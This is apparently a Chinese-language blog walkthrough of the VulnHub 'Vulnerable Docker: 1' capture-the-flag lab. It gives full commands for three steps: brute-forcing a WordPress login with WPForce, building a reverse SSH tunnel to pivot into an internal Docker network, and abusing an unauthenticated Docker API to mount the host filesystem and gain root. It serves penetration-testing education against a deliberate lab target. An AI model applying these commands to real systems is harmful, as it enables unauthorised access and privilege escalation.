No.35-VulnHub-Vulnerable Docker: 1-Walkthrough渗透学习

**

VulnHub-Vulnerable Docker: 1-Walkthrough

**

靶机地址：https://www.vulnhub.com/entry/vulnerable-docker-1,208/
靶机难度：中级（CTF）
靶机发布日期：2017年9月27日
靶机描述：
是否曾经幻想过在容器中使用docker配置错误，权限提升等问题？
下载此虚拟机，拔出笔尖的帽子并开始使用
我们有2种模式：-HARD：这将需要您结合使用docker技能和笔测试技能来实现主机妥协。-轻松：相对简单的路径，知道docker就足以破坏计算机并在主机上获得根。
我们已在可供您使用的各种机器/系统中植入了3个标记文件。如果您选择接受，则您的任务如下：
标识所有标志（总共2个：flag_1和flag_3）（flag_2被无意中遗漏了）
在主机上获得id = 0 shell访问。
目标：得到root权限&找到flag.txt
作者：大余
时间：2020-01-28
请注意：对于所有这些计算机，我已经使用VMware运行下载的计算机。我将使用Kali Linux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的，如果列出的技术用于其他任何目标，我概不负责。

一、信息收集

可以看到靶机开机已经显示了IP：192.168.56.135

nmap扫到了22和8000端口都打开了…可以看到这又是wordpress CMS
直接访问http8000…

直接上wpscan…

这边有挺多信息，有bob用户，存在robot.txt文件，都查看下吧…

http://192.168.232.134:8000/wp-admin/是登录入口…另外一个没啥用…
这边不用rockyou.txt爆破网站，太浪费时间了…几百万个单词…
这边用WPForce爆破…链接


命令：python wpforce.py -i dayu.txt -w /root/Desktop/dayu/10_million_password_list_top_10000.txt -u http://192.168.56.135:8000
命令直接进行爆破，结果：Welcome1 （不懂得可以去查看下链接）
这边还使用bp进行爆破也行，这边填写好代理后，填入bob账号，劫持…


然后发到intruder，放入字典即可爆破，这边我就不多解释了，知道结果即可…

成功登录…

二、提权

找到flag1：

进来后就很熟悉了，直接提权吧…

成功拿到低权后…

不能sudo…

这边发现本地网络有点问题…存在172.18.0.1~4都能ping通…查看下Docker基础架构看看…
应该是存在remote API未授权访问漏洞利用…
这里本来可以用：reGeorg处理的，但是我不会…很尴尬…我这边用别的方法整代理.

我这里写了个sh…
#!/bin/bash
hosts=(
“172.18.0.1”
“172.18.0.2”
“172.18.0.3”
“172.18.0.4”
)
END=65535
…自己琢磨吧…

开启本地服务…

执行，发现了8022端口…在.3上…

查看172.18.0.3:8022的URL发现可以ssh登录…

openssh.deb是这个文件：http://http.us.debian.org/debian/pool/main/o/openssh/openssh-client_6.7p1-5+deb8u4_amd64.deb

命令：dpkg -x openssh.deb .; cd usr/bin; chmod +x ssh*; ./ssh-keygen -P '' -f id_rsa -t rsa; cat id_rsa.pub
用于登陆ssh…

命令：chmod 600 ~/.ssh/authorized_keys
命令：service ssh restart
将密匙放入本地ssh目录中…然后开启ssh…

命令：./ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o GlobalKnownhostsFile=/dev/null -v -i id_rsa -R 8022:172.18.0.3:8022 -fN [email protected]

成功开启代理…

本地访问8022即可登录…

可以看到docker，可以利用remote API未授权访问…
这边需要用外网…我这边设置的是桥接的局域网环境，我这边得重新弄下改外网环境…
先更新源…然后下载curl…

命令：

1. curl -fsSL get.docker.com -o get-docker.sh
2. sh get-docker.sh
3. docker ps
   安装了一个docker，可以看到安装成功了…参考链接
   
   命令：docker run -it --rm -v /:/vol wordpress /bin/bash
   使用volume挂载主机上的所有文件到一个目录…成功提权…查看到了flag3…

这台靶机可以学到Docker利用和remote API未授权访问分析和利用…非常好！！！

由于我们已经成功得到root权限和flag，因此完成了简单靶机，希望你们喜欢这台机器，请继续关注大余后期会有更多具有挑战性的机器，一起练习学习。

如果你有其他的方法，欢迎留言。要是有写错了的地方，请你一定要告诉我。要是你觉得这篇博客写的还不错，欢迎分享给身边的人。